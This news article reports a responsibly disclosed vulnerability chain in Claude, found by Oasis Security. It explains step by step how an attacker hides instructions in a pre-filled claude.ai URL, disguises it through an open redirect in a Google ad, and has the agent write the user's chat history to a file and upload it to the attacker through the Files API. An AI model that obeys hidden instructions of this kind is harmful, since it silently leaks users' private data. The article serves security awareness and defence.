Researchers from Oasis Security recently identified a vulnerability chain in Anthropic's Claude artificial intelligence (AI) agent. When combined, these three flaws—dubbed "Claudy Day"—could allow unauthorized parties to embed hidden instructions in a pre-filled chat URL via a Google search. This mechanism could lead to the unintended exfiltration of sensitive user data and expose users to unauthorized links mimicking legitimate search results.
According to a report published Wednesday by the Oasis Security Research Team, chaining these vulnerabilities creates a continuous path from user targeting to silent data exfiltration. The sequence begins when a user searches for Claude on Google and clicks a seemingly legitimate search result. This link is actually controlled by a malicious actor and contains a pre-filled prompt with hidden instructions. These instructions direct the AI agent to perform actions the user did not intend without requiring additional tools or Model Context Protocol (MCP) servers.
The three specific vulnerabilities include an invisible prompt injection via URL parameters on Claude.ai, a data exfiltration channel utilizing the Anthropic Files API, and an open redirect on Claude.com.
Oasis researchers reported the findings to Anthropic through its responsible disclosure program. Anthropic has since remediated the prompt injection vulnerability and is working to address the remaining issues.
Mechanics of the vulnerability chain
The researchers outlined how this sequence operates methodically. An unauthorized party first crafts an injection URL using a claude.ai/new?q= format, containing hidden exfiltration instructions and their own API key embedded in invisible HTML tags. By wrapping this in the open redirect vulnerability using a claude.com/redirect/<crafted-url> link, the URL appears to originate from a trusted Anthropic domain.
The malicious actor can then create a Google ad using this redirect URL. Google validates the claude.com hostname, approving an ad that displays a URL identical to the legitimate Claude search result.
When users click the link, they are silently redirected from claude.com to claude.ai, landing on a pre-filled prompt. Because the visible text appears benign, the user is likely to submit the prompt. Claude then processes both the visible text and the hidden instructions.
These hidden instructions direct Claude to access the conversation history and write sensitive data to a file in the sandbox. The data is then uploaded to api.anthropic.com (the Files API) using the embedded API key. The unauthorized party can then locate the new upload in their own Anthropic account and read the exfiltrated data.
Impact severity and agent access
The potential impact of this vulnerability chain scales with the permissions and integrations available to the AI agent. In a standard Claude session without external integrations, the hidden injection can access conversation history and memory, extracting information from past chats and exfiltrating it via the Files API.
However, if the user's Claude session has MCP servers, tools, or integrations enabled, the injected prompt can trigger broader actions on the user's behalf. These actions can include reading local files, sending messages, accessing external APIs, or interacting with connected enterprise services. Any data accessed through these tools can then be exfiltrated.
As the Oasis research team noted, "For organizations deploying AI agents with access to enterprise systems, this [vulnerability] chain highlights a broader challenge: prompt integrity cannot be assumed when the delivery channel itself can be compromised."
Strengthening enterprise AI deployments
These findings emphasize prompt integrity as a critical security boundary for AI agents, particularly those with access to sensitive enterprise tools and historical context. As organizations integrate AI agents into employee workflows, securing these access points becomes essential.
While security researchers frequently evaluate Claude as one of the more secure AI assistants available, vulnerabilities still emerge in developing architectures. Previously, state-linked actors have also attempted to leverage Anthropic tools for cyber espionage, demonstrating the high value of these targets for unauthorized parties.
To help protect enterprise environments, we recommend organizations implement strong guardrails around AI agents as they gain broader access to internal resources. A fundamental security practice is applying the principle of least privilege to AI tools to reduce the impact of prompt injection vulnerabilities.
Following the specific guidance from the Oasis researchers, development teams should build in friction before automated actions execute.
"When MCP servers and integrations are available from the very first interaction, with no user confirmation, a single injected prompt can immediately leverage those tools," the researchers wrote. "Requiring explicit user approval before using the tool on the first prompt would add a meaningful barrier."